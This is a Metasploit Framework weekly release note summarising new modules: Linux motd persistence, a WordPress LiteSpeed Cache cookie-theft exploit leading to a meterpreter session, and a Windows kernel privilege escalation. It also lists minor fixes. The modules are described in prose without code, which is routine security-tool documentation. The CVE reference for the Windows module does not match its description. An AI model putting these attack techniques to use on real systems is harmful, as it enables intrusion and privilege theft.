Metasploit Weekly Wrap-Up 09/20/2024

New module content (3)

update-motd.d Persistence

Author: Julien Voisin
Type: Exploit
Pull request: #19454 contributed by jvoisin
Path: linux/local/motd_persistence

Description: This adds a post module to keep persistence on a Linux target by writing a motd bash script triggered with root privileges every time a user logs into the system through SSH.

Wordpress LiteSpeed Cache plugin cookie theft

Authors: Rafie Muhammad and jheysel-r7
Type: Exploit
Pull request: #19457 contributed by jheysel-r7
Path: multi/http/wp_litespeed_cookie_theft
AttackerKB reference: CVE-2024-44000

Description: This adds an exploit module for a WordPress Plugin called LiteSpeed (CVE-2024-44000). On the vulnerable plugin, when the Debug Logs are enabled, it is possible to leak authentication cookies of logged in users, the msf module will use the stolen cookies to upload and execute a plugin able to spawn a meterpreter session.

Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes

Authors: jheysel-r7 and tykawaii98
Type: Exploit
Pull request: #19345 contributed by jheysel-r7
Path: windows/local/cve_2024_30088_authz_basep
AttackerKB reference: CVE-2024-30038

Description: This adds a Windows LPE post module that exploits CVE-2024-30088. Once the exploit is executed through a running meterpreter session, it will open another one with NT AUTHORITY/SYSTEM privileges.

Enhancements and features (3)

• #19414 from cdelafuente-r7 - Adds some missing constants for the Kerberos LoginScanner as defined in the documentation. This also defines the default connection_timeout value in #set_sane_defaults as defined here.
• #19443 from jvoisin - Removes some redundant code from lib/msf/core/payload/php.rb.
• #19445 from jvoisin - Makes minor improvements of lib/msf/core/payload/php.rb.

Bugs fixed (1)

• #19449 from zeroSteiner - This fixes an issue in the exploit for CVE-2022-0995 where it would crash with an exception while printing a message regarding why it failed.

Documentation added (1)

• #19452 from zeroSteiner - This improves the Metasploit’s documentation explaining how to setup a Meterpreter handler over Ngrok port-forwarding.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.26…6.4.27
• Full diff 6.4.26…6.4.26…6.4.27

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro